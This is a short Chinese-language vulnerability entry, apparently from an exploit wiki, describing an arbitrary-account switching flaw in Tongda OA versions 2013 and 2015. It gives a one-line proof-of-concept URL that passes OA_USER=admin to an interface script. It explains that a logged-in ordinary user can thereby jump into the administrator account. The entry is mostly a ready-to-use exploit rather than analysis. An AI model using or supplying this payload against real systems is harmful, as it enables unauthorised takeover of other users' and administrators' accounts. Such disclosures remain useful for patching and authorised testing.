跳转至

通达oa 任意账号跳转

通达oa 任意账号跳转

漏洞描述

需要登录

漏洞影响

2013、2015版本

漏洞复现

POC:

http://url/interface/ugo.php?OA_USER=admin

通过控制OA_USER参数进行任意⽤户的跳转,⽐如说你现在是个普通权限的⽤户,使用这个⻚面即可跳转到admin用户下面。